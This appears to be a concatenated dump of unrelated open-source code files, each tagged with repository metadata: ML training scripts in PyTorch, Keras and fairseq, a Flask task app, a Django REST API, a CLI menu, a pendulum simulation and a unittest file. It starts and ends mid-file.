nline += N  # count processed samples so the near-empty-batch guard above is meaningful
loss = crit(output, targets)
running_loss += loss.item() * N
_, preds = torch.max(output.data, 1) # get the argmax index along the axis 1
preds_val = torch.cat((preds_val, preds))
labels_val = labels_val.to(device)
labels_val_cpu, preds_val_cpu = labels_val.cpu(), preds_val.cpu()  # sklearn/numpy need CPU tensors
val_acc = accuracy_score(labels_val_cpu, preds_val_cpu)
f1 = f1_score(labels_val_cpu, preds_val_cpu, average='macro')
unique, counts = np.unique(labels_val_cpu.numpy(), return_counts=True)
return val_acc, f1, preds_val, labels_val, running_loss/labels_val.size(0), dict(zip(unique, counts))
def train_model(model, criterion = None, num_epochs=100, train_loader = train_loader, val_loader = val_loader):
best_f1 = 0
best_epoch = 0
start_training = time.time()
for epoch in range(num_epochs):
start = time.time()
if epoch < 15: lr = args.lr
elif epoch < 30: lr = args.lr/2
elif epoch < 40: lr = args.lr/10
elif epoch < 60: lr = args.lr / 50
else: lr = args.lr/100
if epoch >= 50:
for param in model.parameters():
param.requires_grad = True
optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, momentum=0.9, weight_decay=args.weight_decay)
print('Epoch {}/{}'.format(epoch + 1, num_epochs))
print('lr: {:.6f}'.format(lr))
print('-' * 50)
for phase in ['train']:
if phase == 'train':
data_loader = train_loader
model.train(True)
else:
data_loader = val_loader
model.train(False)
running_loss = 0.0
running_corrects = 0
N_tot = 0
labels_train = torch.zeros(0).type(torch.LongTensor)
preds_train = torch.zeros(0).type(torch.LongTensor).to(device)
for ix, data in enumerate(data_loader):
if (len(data_loader.dataset) - N_tot) < 3: continue
inputs, labels = data
labels_train = torch.cat((labels_train, labels.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
labels = Variable(labels.type(torch.LongTensor).to(device))
optimizer.zero_grad()
outputs = model(inputs)
if type(outputs) == tuple: # for inception_v3 output
outputs,_ = outputs
_, preds = torch.max(outputs.data, 1)
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
N_tot += outputs.size(0)
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
preds_train = torch.cat((preds_train, preds))
unique, counts = np.unique(np.array(labels_train), return_counts=True)
print('| Epoch:[{}][{}/{}]\tTrain_Loss: {:.4f}\tAccuracy: {:.4f}\tTrain_data: {}\tTime: {:.2f} mins'.format(epoch + 1, ix + 1,
len(data_loader.dataset)//args.batch_size,
running_loss / N_tot, running_corrects.item() / N_tot, dict(zip(unique, counts)), (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(labels_train.to(device), preds_train, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
sys.stdout.flush()
############ VALIDATION #############################################
if (epoch + 1) % args.check_after == 0:
model.eval()
start = time.time()
val_acc, f1, Pr, Tr, val_loss, labels_val = val_fn_epoch(val_fn = model, crit = criterion, val_loader = val_loader)
print("Epoch: {}\tVal_Loss: {:.4f}\tAccuracy: {:.4f}\tF1-score: {:.4f}\tVal_data: {}\tTime: {:.3f}mins".format(
(epoch + 1), val_loss, val_acc, f1,labels_val, (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(Tr, Pr, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
start = time.time()
# deep copy the model
if f1 > best_f1 and epoch > 2:
print('Saving model')
best_f1 = f1
best_epoch = epoch + 1
best_model = copy.deepcopy(model)
state = {
'model': best_model,
'f1-score': best_f1,
'args': args,
'lr': lr,
'saved_epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
save_point = './checkpoint/'
if not os.path.isdir(save_point):
os.mkdir(save_point)
saved_model_fn = args.net_type + '_' + strftime('%m%d_%H%M')
torch.save(state, save_point + saved_model_fn + '_' + str(best_f1) + '_' + str(epoch) + '.t7')
print('=======================================================================')
time_elapsed = time.time() - start_training
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best F1-score: {:4f} at epoch: {}'.format(best_f1, best_epoch))
def main():
sys.setrecursionlimit(10000)
if args.net_depth == 34:
model = models.resnet34(pretrained=True)
elif args.net_depth == 50:
model = models.resnet50(pretrained=True)
elif args.net_depth == 101:
model = models.resnet101(pretrained=True)
elif args.net_depth == 152:
model = models.resnet152(pretrained=True)
for param in model.parameters():
param.requires_grad = False
num_in = model.fc.in_features
model.fc = nn.Linear(num_in, 2)
model = model.to(device)
model = torch.nn.DataParallel(model, device_ids=[0,1])
cudnn.benchmark = True
print(model)
print('Start training ... ')
criterion = nn.CrossEntropyLoss().to(device)
train_model(model, criterion, num_epochs=args.num_epochs, train_loader=train_loader, val_loader=val_loader)
if __name__ == "__main__":
main()
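# Example invocation (hypothetical values; the data folders above are hard-coded
# for the original cluster and must be adapted to your environment):
#   python train_prostate_cnn_Resnet_pretrained_SEER.py --net_depth 34 \
#       --batch_size 256 --num_epochs 100 --APS 175 --lr 1e-2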
| 2.0625
| 2
|
python_scripts/calculate_training_set_size_vs_loss.py
|
GoldenholzLab/LPC-RCT
| 0
|
12782903
|
from train_keras_model import build_single_perceptron
import matplotlib.pyplot as plt
import numpy as np
import json
import os
import time
os.environ['KMP_DUPLICATE_LIB_OK']='True'
def create_model_and_load_training_data(training_data_dir,
training_samples_file_name):
training_data_file_path = training_data_dir + '/' + training_samples_file_name + '.json'
single_perceptron_model = build_single_perceptron(80)
with open(training_data_file_path, 'r') as training_data_json_file:
data = json.load(training_data_json_file)
placebo_arm_hists = np.array(data[0])
drug_arm_hists = np.array(data[1])
labels = np.array(data[2])
return [single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels]
def training_set_size_vs_loss(single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels,
batch_size,
num_epochs,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification):
num_training_samples_per_classification_array = \
np.arange(num_training_samples_per_classification_step,
final_num_training_samples_per_classification + num_training_samples_per_classification_step,
num_training_samples_per_classification_step)
num_training_set_sizes = \
int(final_num_training_samples_per_classification/num_training_samples_per_classification_step)
final_epoch_loss_array = np.zeros(num_training_set_sizes)
for num_training_samples_per_classification_index in range(num_training_set_sizes):
num_training_samples_per_classification = \
num_training_samples_per_classification_array[num_training_samples_per_classification_index]
tmp_placebo_arm_hists = placebo_arm_hists[:2*num_training_samples_per_classification, :, :]
tmp_drug_arm_hists = drug_arm_hists[:2*num_training_samples_per_classification, :, :]
tmp_labels = labels[:2*num_training_samples_per_classification]
history = \
single_perceptron_model.fit([tmp_placebo_arm_hists, tmp_drug_arm_hists],
tmp_labels, batch_size=batch_size, epochs=num_epochs)
final_epoch_loss_array[num_training_samples_per_classification_index] = history.history['loss'][num_epochs - 1]
return [num_training_samples_per_classification_array,
final_epoch_loss_array]
def store_losses_over_training_set_sizes(num_training_samples_per_classification_array,
final_epoch_loss_array,
losses_storage_dir,
losses_file_name):
losses_storage_file_path = losses_storage_dir + '/' + losses_file_name + '.json'
with open(losses_storage_file_path, 'w+') as json_file:
data = []
data.append(num_training_samples_per_classification_array.tolist())
data.append(final_epoch_loss_array.tolist())
json.dump(data,json_file)
def get_inputs():
training_data_dir = os.getcwd()
losses_storage_dir = os.getcwd()
training_samples_file_name = '200000_weekly_level_15_training_samples'
losses_file_name = 'training_set_size_losses'
num_training_samples_per_classification_step = 5000
final_num_training_samples_per_classification = 100000
batch_size = 100
num_epochs = 50
return [training_data_dir,
training_samples_file_name,
losses_storage_dir,
losses_file_name,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification,
batch_size,
num_epochs]
def main():
[training_data_dir,
training_samples_file_name,
losses_storage_dir,
losses_file_name,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification,
batch_size,
num_epochs] = \
get_inputs()
[single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels] = \
create_model_and_load_training_data(training_data_dir,
training_samples_file_name)
[num_training_samples_per_classification_array,
final_epoch_loss_array] = \
training_set_size_vs_loss(single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels,
batch_size,
num_epochs,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification)
store_losses_over_training_set_sizes(num_training_samples_per_classification_array,
final_epoch_loss_array,
losses_storage_dir,
losses_file_name)
if(__name__=='__main__'):
start_time_in_seconds = time.time()
main()
stop_time_in_seconds = time.time()
total_runtime_in_seconds = stop_time_in_seconds - start_time_in_seconds
total_runtime_in_minutes = total_runtime_in_seconds/60
total_runtime_in_minutes_str = str(np.round(total_runtime_in_minutes, 3)) + ' minutes'
print(total_runtime_in_minutes_str)
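def plot_losses_over_training_set_sizes(losses_storage_dir, losses_file_name):
    """Hedged sketch (added for illustration, not called above): load the JSON
    written by store_losses_over_training_set_sizes() and plot final-epoch loss
    against training-set size, using the matplotlib import at the top."""
    losses_storage_file_path = losses_storage_dir + '/' + losses_file_name + '.json'
    with open(losses_storage_file_path, 'r') as json_file:
        [sizes, losses] = json.load(json_file)
    plt.plot(sizes, losses, marker='o')
    plt.xlabel('training samples per classification')
    plt.ylabel('final-epoch loss')
    plt.show()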
| 2.65625
| 3
|
thread_queue_tests/test_queue_not_empty_exception.py
|
timmartin19/thread-queue
| 0
|
12782904
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from thread_queue import QueueNotEmptyException, ThreadTaskException
class TestQueueNotEmptyException(unittest.TestCase):
def test_all_unprocessed_tasks(self):
exc_task = ThreadTaskException('blah', Exception(), task='task_blah')
exc = Exception('something')
exc_task_ignored = ThreadTaskException('blah2', Exception())
queue_exc = QueueNotEmptyException('blah', ['something'], [exc, exc_task, exc_task_ignored])
self.assertListEqual(['something', 'task_blah'], queue_exc.all_unprocessed_tasks)
def test_unattempted_tasks(self):
exc_task = ThreadTaskException('blah', Exception(), task='task_blah')
exc = Exception('something')
exc_task_ignored = ThreadTaskException('blah2', Exception())
queue_exc = QueueNotEmptyException('blah', ['something'], [exc, exc_task, exc_task_ignored])
self.assertListEqual(['something'], queue_exc.unattempted_tasks)
def test_thread_exceptions(self):
exc_task = ThreadTaskException('blah', Exception(), task='task_blah')
exc = Exception('something')
exc_task_ignored = ThreadTaskException('blah2', Exception())
queue_exc = QueueNotEmptyException('blah', ['something'], [exc, exc_task, exc_task_ignored])
self.assertListEqual([exc, exc_task, exc_task_ignored], queue_exc.thread_exceptions)
| 2.890625
| 3
|
app.py
|
Varigarble/twin-atom
| 0
|
12782905
|
from pprint import pprint
from flask import Flask, render_template, request
import database
app = Flask(__name__)
@app.route('/')
def index():
return render_template('layout.html')
@app.route('/tasks_entry.html', methods=['GET', 'POST'])
def tasks_entry():
name = None
creators = None
description = None
start_date = None
completion_date = None
due_date = None
priority = None
assigned_to = None
project_file = None
status = None
if request.method == "POST":
name = request.form.get("name")
creators = request.form.get("creators")
description = request.form.get("description")
start_date = request.form.get("start_date")
completion_date = request.form.get("completion_date")
due_date = request.form.get("due_date")
priority = request.form.get("priority")
assigned_to = request.form.get("assigned_to")
project_file = request.form.get("project_file")
status = request.form.get("status")
return render_template('tasks_entry.html',
name = name,
creators = creators,
description = description,
start_date = start_date,
completion_date = completion_date,
due_date = due_date,
priority = priority,
assigned_to = assigned_to,
project_file = project_file,
status = status,
)
@app.route('/tasks_view.html', methods=['GET', 'POST'])
def tasks_view():
selected_creator = None
creators_tasks = None
if request.method == "POST":
selected_creator = request.form.get("creators")
creators_tasks = database.view_all_tasks_by_creators(selected_creator)
return render_template('tasks_view.html',
all_tasks = database.view_all_tasks(),
all_creators = database.get_all_creators(),
selected_creator = selected_creator,
creators_tasks = creators_tasks,
)
MENU = """Please select one of the following options:
1) View tasks
2) Create task
3) Update task
4) Delete task
5) Exit.
Your selection: """
def main_menu():
# use for testing
while (user_input := input(MENU)):
if user_input == "1":
pprint(database.view_all_tasks())
elif user_input == "2":
database.create_task()
elif user_input == "3":
database.update_task()
elif user_input == "4":
database.delete_task()
elif user_input == "5":
break
else:
print("Invalid input, please try again!")
if __name__ == "__main__":
app.run(debug=True)
# main_menu()
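# Usage sketch (assumptions: default Flask development server on port 5000):
#   $ python app.py
#   $ curl http://localhost:5000/tasks_view.html
#   $ curl -X POST -d "name=Demo&creators=me" http://localhost:5000/tasks_entry.html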
| 2.453125
| 2
|
src/svm/gm/preprocessing.py
|
aramis-lab/pac2019
| 3
|
12782906
|
"""File with the preprocessing tools."""
import os
import numpy as np
import nibabel as nib
import pandas as pd
from tqdm import tqdm
from sklearn.metrics import pairwise_distances
from sklearn.metrics.pairwise import linear_kernel
# Change this path
path = '' # folder containing the gray-matter maps
# Folders with the resulting data
output_data = 'Data/'
output_kernels = 'Kernels/'
output_target = 'Target/'
# List of all the NifTI files
nifti_images = [file for file in os.listdir(path) if file.endswith('.nii.gz')]
# Convert each NifTI into a numpy.ndarray
for file in nifti_images:
img = nib.load(os.path.join(path, file))
img_data = img.get_fdata()
np.save(os.path.join(output_data, file.split('_')[0]), img_data)
# Get the subject IDs
subjects = []
listdir = os.listdir(output_data)
listdir = [x for x in listdir if not x.startswith('.')]
n_samples = len(listdir)
# Compute the kernels using batches to reduce the memory usage
batches = np.array_split(np.arange(len(listdir)), 20)
lin_kernel = np.empty((n_samples, n_samples))
euclidean_norm = np.empty((n_samples, n_samples))
for batch_i in tqdm(batches):
data_i = []
for i in batch_i:
data_i.append(np.load(output_data + listdir[i]).ravel())
subjects.append(listdir[i].split('.')[0])
data_i = np.asarray(data_i)
for batch_j in batches:
data_j = []
for j in batch_j:
data_j.append(np.load(output_data + listdir[j]).ravel())
data_j = np.asarray(data_j)
# Compute the kernels
euclidean_norm[batch_i[0]:batch_i[-1] + 1,
batch_j[0]:batch_j[-1] + 1] = (
pairwise_distances(data_i, data_j, metric='euclidean') ** 2
)
lin_kernel[batch_i[0]:batch_i[-1] + 1, batch_j[0]:batch_j[-1] + 1] = (
linear_kernel(data_i, data_j)
)
# Save the kernels in CSV files
linear_kernel_df = pd.DataFrame(lin_kernel, index=subjects, columns=subjects)
linear_kernel_df.to_csv(output_kernels + 'linear_kernel.csv')
euclidean_norm_df = pd.DataFrame(euclidean_norm, index=subjects,
columns=subjects)
euclidean_norm_df.to_csv(output_kernels + 'euclidean_norm.csv')
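# Illustrative addition (not in the original pipeline): a Gaussian (RBF) kernel
# can be derived directly from the stored squared Euclidean distances. The
# bandwidth heuristic below is an assumption; tune gamma per task.
gamma = 1.0 / euclidean_norm[euclidean_norm > 0].mean()
rbf_kernel_df = pd.DataFrame(np.exp(-gamma * euclidean_norm),
                             index=subjects, columns=subjects)
rbf_kernel_df.to_csv(output_kernels + 'rbf_kernel.csv')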
# Save the target variable in a CSV file
# Change this path
df_y = pd.read_csv("/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/"
"PAC2019_BrainAge_Training.csv")
y = []
for subject in subjects:
y.append(df_y[df_y['subject_ID'] == subject]['age'].item())
df_y_new = pd.Series(y, index=subjects)
df_y_new.to_csv(output_target + 'age.csv')
| 2.28125
| 2
|
climate/core/menu.py
|
FidelElie/cliMate
| 0
|
12782907
|
"""
"""
import sys
import itertools
from climate.lib import mapper
from climate.lib import utilities
from climate.lib import inquirers
from climate.lib.inquirers import INQUIRER_TABLE
from climate.lib.converters import CONVERSION_TABLE
from climate.lib.converters import map_int, map_float, map_bool, map_list
from . import Parsing
from . import Help
class Menu(object):
"""Class For Handling Application Menu Navigation
Will be disabled if the setting 'use_menu' is set to false
Parameters
----------
cli_data: dict
Cli data passed through from main CliMate class.
"""
current_local = []
locations = []
help_mapper = {
"Show Commands": "display_help",
"Show Documentation": "show_docs"
}
standard_option_mapper = {
"Help": "open_help_menu",
"Exit": "exit_application"
}
def __init__(self, cli_data, settings):
self.cli_data = cli_data
self.settings = settings
def open_main_menu(self):
if "menu" not in self.cli_data["general"]:
self.standard_navigation()
else:
self.locations = self.cli_data["general"]["menu"]
self.menued_navigation()
def standard_navigation(self):
commands = self.cli_data["commands"]
command_keys = [key for key in commands]
command_names = [commands[key]["name"] for key in commands]
menu_names = command_names.copy()
menu_names += self.add_menu_options()
app_name = self.settings["app_name"]
menu_message = app_name if app_name is not None else "Main Menu"
command_menu_name = inquirers.inquirer_list(
menu_names, menu_message)
if command_menu_name in command_names:
command_name_index = command_names.index(command_menu_name)
command_key = command_keys[command_name_index]
command_args = commands[command_key]["arguments"]
parsed_command_args = \
Parsing.resolve_command_arguments(
command_args, self.cli_data)
command_target = commands[command_key]["target"]
command_arguments = self.menu_arguments(parsed_command_args)
Parsing.call_target(
command_key, command_target, command_arguments, self.settings)
else:
# a standard application option was chosen (i.e. one not defined in the cli file)
method_string = self.standard_option_mapper[command_menu_name]
getattr(self, method_string)()
def menued_navigation(self):
while True:
command_found = False
if not self.current_local:
local = self.locations
else:
local = self.resolve_local(self.current_local)
if isinstance(local, dict):
local_func, local_args = inquirers.get_inquirer("list")
local_args["choices"] = local
if self.current_local:
local["Back"] = "navigate_back"
local_args["message"] = self.current_local[-1]
else:
# add buttons to main menu
for key in self.standard_option_mapper:
if self.settings[f"menu_{key.lower()}"]:
local[key] = self.standard_option_mapper[key]
app_name = self.settings["app_name"]
local_args["message"] = \
app_name if app_name is not None else "Main Menu"
nav_point = local_func(**local_args)
self.current_local += [nav_point]
elif isinstance(local, str):
try:
self.navigate_back()
if local not in [*self.cli_data["commands"]]:
command_found = False
getattr(self, local)()
else:
command_found = True
chosen_command = self.cli_data["commands"][local]
command_target = chosen_command["target"]
args = chosen_command["arguments"]
resolved_arguments = \
Parsing.resolve_command_arguments(args, self.cli_data)
arguments = self.menu_arguments(resolved_arguments)
Parsing.call_target(command_target, arguments)
except KeyError:
TypeError("Error in chosen command.")
else:
raise TypeError("Invalid Datatype Found For Menu Navigation.")
if command_found:
if self.settings["exit_upon_command"]:
sys.exit()
def open_help_menu(self):
help_func, help_args = inquirers.get_inquirer("choices")
help_args["choices"] = [key for key in self.help_mapper]
message = self.settings["help_menu_message"]
help_args["message"] = message if message is not None else "Help"
help_choice = help_func(**help_args)
help_handler = Help(self.cli_data, self.settings)
help_method_string = self.help_mapper[help_choice]
getattr(help_handler, help_method_string)()
def exit_application(self):
print("Exiting Application")
sys.exit(0)
def add_menu_options(self):
navigations = []
for key in self.settings:
if "menu" == key.split("_")[0]:
navigations.append(
[self.settings[key], key.split("_")[1].capitalize()])
return [nav[1] for nav in navigations if nav[0]]
def resolve_local(self, keys):
local = self.locations
for key in keys:
local = local[key]
return local
def navigate_back(self):
del self.current_local[-1]
@staticmethod
def menu_arguments(command_args):
"""Uses Pyinquirer to get desired arguments through MenuHandler.
Parameters
----------
command_args: dict
Dictionary containing the command arguments.
Returns
-------
arguments: dict
Dictionary containing desired and chosen arguments.
"""
try:
arguments = {}
for arg in command_args:
inquirer_function, inquirer_args = \
inquirers.get_inquirer(command_args[arg]["type"])
inquirer_args["message"] = command_args[arg]["name"]
if "default" in command_args[arg]:
inquirer_args["message"] = "{} ({})".format(inquirer_args["message"], command_args[arg]["default"])
if command_args[arg]["type"] == "choices":
if "map" in command_args[arg]:
inquirer_args["choices"] = \
mapper.map_string(
command_args[arg]["map"], arguments)
else:
inquirer_args["choices"] = \
[c for c in command_args[arg]["choices"].values()]
if "fallback" in command_args[arg]:
fallback_option = command_args[arg]["fallback"]
inquirer_args["choices"] += [fallback_option]
def fallback(x):
if x == command_args[arg]["fallback"]:
if "default" not in command_args[arg]:
return None
else:
return command_args[arg]["default"]
else:
choices = command_args[arg]["choices"]
return list(choices.keys())[
list(choices.values()).index(x)]
inquirer_args["lambda_filter"] = fallback
else:
if "default" in command_args[arg]:
if "lambda_filter" in inquirer_args:
def full_conversion(x):
x = command_args[arg]["default"] if x.strip() is "" else x
if command_args[arg]["type"] == "float":
return float(x)
elif command_args[arg]["type"] == "int":
return int(x)
else:
return x
inquirer_args["lambda_filter"] = full_conversion
else:
inquirer_args["lambda_filter"] = lambda x: command_args[arg]["default"] if x.strip() is "" else x
arguments[arg] = inquirer_function(**inquirer_args)
except KeyError:
raise KeyError(f"Invalid Command argument '{arg}'")
return arguments
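# Minimal usage sketch (the cli_data/settings schemas below are inferred from
# the methods above, not taken from the real cliMate configuration):
#
#     cli_data = {"general": {}, "commands": {
#         "greet": {"name": "Greet", "target": "pkg.mod.greet", "arguments": {}}}}
#     settings = {"app_name": "demo", "menu_help": True, "menu_exit": True,
#                 "exit_upon_command": True, "help_menu_message": None}
#     Menu(cli_data, settings).open_main_menu()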
| 2.4375
| 2
|
src/obj/pendulum.py
|
jesuscfv/friction_less
| 0
|
12782908
|
import numpy as np
import math
from . import physicalobject, definitions as defs, resources, rungekutta
class Pendulum(physicalobject.PhysicalObject):
def __init__(self, phi=0.7854, length=1.0, x_h=1.0, y_h=1.0, *args, **kwargs):
image = resources.get_resource(defs.PENDULUM_IMAGE)
super(Pendulum, self).__init__(img=image, *args, **kwargs)
# Pendulum parameters
self.length = length
self.gl = float(defs.g)/1.0
if length > 0.0:
self.gl = float(defs.g)/float(length)
# Initial 2-D homogeneous matrix
self.a_H_p = np.array([[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]])
# Initial 2-D homogeneous matrix for the rotation axis
self.tb_H_a = np.array([[1.0, 0.0, float(x_h)],
[0.0, 1.0, float(y_h)],
[0.0, 0.0, 1.0]])
# Initial screen coordinates
self.s = np.array([[0.0], [0.0]])
#self.x, self.y = int(self.s[0]), int(self.s[1])
# Pendulum state
self.Y = np.array([[float(phi)], [0.0]])
self.update_a_H_p(phi)
# Initial conditions for the Runge-Kutta solver
self.rg = rungekutta.RungeKutta(y_0=self.Y)
def update(self, dt):
# Physics stuff (update position)
super(Pendulum, self).update(dt)
# Update pendulum state
self.Y = self.rg.step(self.dynamics, dt)
self.update_a_H_p(self.Y[0][0])
'''self.s = defs.S.dot(self.tb_H_a.dot(self.a_H_p[:3, 2:]))
self.x, self.y = int(self.s[0]), int(self.s[1])
self.rotation = math.degrees(self.Y[0][0]) + 90'''
def dynamics(self, Y):
# The dynamics uses local coordinates
return [[Y[1][0]], [-self.gl*np.sin(Y[0][0])]]
def update_a_H_p(self, phi):
c_phi = np.cos(phi)
s_phi = np.sin(phi)
self.a_H_p = np.array([[c_phi, -s_phi, -self.length * s_phi],
[s_phi, c_phi, -self.length*c_phi],
[0.0, 0.0, 1.0]])
self.s = defs.S.dot(defs.w_H_tb.dot(self.tb_H_a.dot(self.a_H_p[:3, 2:])))
# Update sprite position and orientation
self.x, self.y = self.s[0], self.s[1]
self.rotation = math.degrees(self.Y[0][0]) + 90
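def _simulate_pendulum_standalone(phi0=0.7854, length=1.0, g=9.81,
                                  dt=0.01, steps=1000):
    """Hedged sketch (added for illustration): integrate the same dynamics
    phi'' = -(g / length) * sin(phi) with a plain RK4 step, independent of the
    game loop and RungeKutta helper above. Returns the final [phi, phi_dot]."""
    gl = g / length
    f = lambda s: np.array([s[1], -gl * np.sin(s[0])])
    y = np.array([phi0, 0.0])
    for _ in range(steps):
        k1 = f(y)
        k2 = f(y + 0.5 * dt * k1)
        k3 = f(y + 0.5 * dt * k2)
        k4 = f(y + dt * k3)
        y = y + (dt / 6.0) * (k1 + 2.0 * k2 + 2.0 * k3 + k4)
    return y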
| 2.671875
| 3
|
backend/posts/views.py
|
shakib609/django-redis-blog
| 0
|
12782909
|
from django.conf import settings
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from django.core.cache.backends.base import DEFAULT_TIMEOUT
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAdminUser
from rest_framework_extensions.mixins import NestedViewSetMixin
from common.permissions import IsAuthorOrReadOnly
from .models import Comment, Post, Tag
from .serializers import CommentSerializer, PostSerializer, TagSerializer
CACHE_TIMEOUT = getattr(settings, 'CACHE_TIMEOUT', DEFAULT_TIMEOUT)
class PostViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
queryset = Post.objects.all()
serializer_class = PostSerializer
lookup_field = 'slug'
permission_classes = [IsAuthenticatedOrReadOnly, IsAuthorOrReadOnly]
@method_decorator(cache_page(CACHE_TIMEOUT))
def list(self, request, *args, **kwargs):
return super().list(request, *args, **kwargs)
class CommentViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
queryset = Comment.objects.all()
serializer_class = CommentSerializer
permission_classes = [IsAuthenticatedOrReadOnly, IsAuthorOrReadOnly]
class TagViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
lookup_field = 'slug'
permission_classes = [IsAuthenticatedOrReadOnly]
@method_decorator(cache_page(CACHE_TIMEOUT))
def list(self, request, *args, **kwargs):
return super().list(request, *args, **kwargs)
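# Hedged configuration sketch (assumed names; adapt to your settings module).
# The CACHE_TIMEOUT read above could be configured in settings.py as e.g.:
#
#     CACHES = {"default": {"BACKEND": "django_redis.cache.RedisCache",
#                           "LOCATION": "redis://127.0.0.1:6379/1"}}
#     CACHE_TIMEOUT = 60 * 15  # seconds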
| 2.015625
| 2
|
m_kplug/model/kplug_dataset.py
|
WaveLi123/m-kplug
| 2
|
12782910
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import torch
import random
import math
import logging
import itertools
from fairseq import utils
from fairseq.data import FairseqDataset, LanguagePairDataset
from .noise_util import apply_span_mask, apply_random_mask, apply_entity_mask_for_mlm
from fairseq.data import data_utils
logger = logging.getLogger(__name__)
def collate(
samples,
pad_idx,
eos_idx,
left_pad_source=False,
left_pad_target=False,
input_feeding=True,
pad_to_length=None,
):
if len(samples) == 0:
return {}
def merge(key, left_pad, move_eos_to_beginning=False, pad_to_length=None):
return data_utils.collate_tokens(
[s[key] for s in samples],
pad_idx, eos_idx, left_pad, move_eos_to_beginning,
pad_to_length=pad_to_length,
)
# sort by descending source length
src_lengths = torch.LongTensor([s['source'].ne(pad_idx).long().sum() for s in samples])
src_lengths, sort_order = src_lengths.sort(descending=True)
id = torch.LongTensor([s['id'] for s in samples]).index_select(0, sort_order)
src_tokens = merge('source', left_pad=left_pad_source).index_select(0, sort_order)
# sentence classification
cls_target = merge('cls_target', left_pad=left_pad_target).index_select(0, sort_order).view(-1)
# masked language model
mlm_target = merge('mlm_target', left_pad=left_pad_target).index_select(0, sort_order)
# causal language model
prev_output_tokens = merge('prev_output_tokens', left_pad=left_pad_target).index_select(0, sort_order)
prev_output_positions = merge('prev_output_positions', left_pad=left_pad_target).index_select(0, sort_order)
clm_target = merge('clm_target', left_pad=left_pad_target).index_select(0, sort_order)
# sequence tagging
tag_target = merge('tag_target', left_pad=left_pad_target).index_select(0, sort_order)
ntokens = src_lengths.sum().item()
batch = {
'id': id,
'nsentences': len(samples),
'ntokens': ntokens,
'net_input': {
'src_tokens': src_tokens,
'src_lengths': src_lengths,
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
},
'cls_target': cls_target,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': tag_target,
}
return batch
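# Usage sketch (illustrative; each sample dict must carry the keys read above):
#
#     batch = collate(samples, pad_idx=src_dict.pad(), eos_idx=src_dict.eos())
#     src = batch['net_input']['src_tokens']   # (B, T), sorted by length desc
#     mlm_target = batch['mlm_target']         # pad everywhere except masked positions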
class KnowledgeLanguagePairDataset(LanguagePairDataset):
@classmethod
def apply_mask(cls, dataset: torch.utils.data.Dataset, *args, **kwargs):
"""Return the source and target datasets for masked LM training."""
return cls(dataset, *args, **kwargs)
def __init__(
self, src, src_sizes, src_dict,
tgt=None, tgt_sizes=None, tgt_dict=None,
meta=None, meta_sizes=None, meta_dict=None,
left_pad_source=True, left_pad_target=False,
max_source_positions=1024, max_target_positions=1024,
shuffle=True,
mask_idx=None,
mask_prob=0.15, leave_unmasked_prob=0.1, random_token_prob=0.1,
mask_whole_words=None,
block_size=64,
sub_task=None,
):
super().__init__(src, src_sizes, src_dict,
tgt=tgt, tgt_sizes=tgt_sizes, tgt_dict=tgt_dict,
left_pad_source=left_pad_source, left_pad_target=left_pad_target,
shuffle=shuffle)
self.meta = meta
self.meta_sizes = meta_sizes
self.meta_dict = meta_dict
self.mask_idx = mask_idx
self.mask_prob = mask_prob
assert len(meta_sizes) == len(src_sizes)
self.sub_task = sub_task
self.cls_pad = self.src_dict.pad() # 0 in bert_dict, 1 in fairseq_dict
self.block_size = block_size
self.max_source_positions = max_source_positions
self.max_target_positions = max_target_positions
self.pred_probs = torch.FloatTensor(
[1 - leave_unmasked_prob - random_token_prob, leave_unmasked_prob, random_token_prob])
self.debug_size_for_mlm = 0
self.debug_size_for_clm = 0
self.debug_size_for_tag = 0
self.debug_size_for_cls = 0
self.debug_size_for_titlegen = 0
def _parse_ocr_data(self, src_item):
"""
Args:
src_item:
- title [SEP] content [SEP] title [SEP] content.
- used for title generation
- file: discovery_all.ocr
"""
def _get_title_and_content(sep_idx):
title_pos = []
content_pos = []
for i, pos in enumerate(sep_idx):
last_pos = sep_idx[i - 1] if i > 0 else 1
pos_range = np.arange(last_pos + 1,
pos) if pos > last_pos + 1 else None
if i % 2 == 0:
title_pos.append(pos_range)
else:
content_pos.append(pos_range)
if len(content_pos) < len(title_pos):
content_pos.append(None)
return title_pos, content_pos
src_item_np = np.array(src_item)
sep_idx = np.where(src_item_np == self.src_dict.eos())[0]
title_positions, content_positions = _get_title_and_content(sep_idx)
source = src_item[:1]
clm_target = np.array([], dtype=src_item_np.dtype)
prev_output_positions_list = []
sep_positions_list = []
for title_position, content_position in zip(title_positions, content_positions):
if title_position is not None:
old_len = len(source)
source = np.append(source, src_item[title_position])
clm_target = np.append(clm_target, src_item[title_position])
prev_output_positions_list = prev_output_positions_list + list(range(old_len, len(source)))
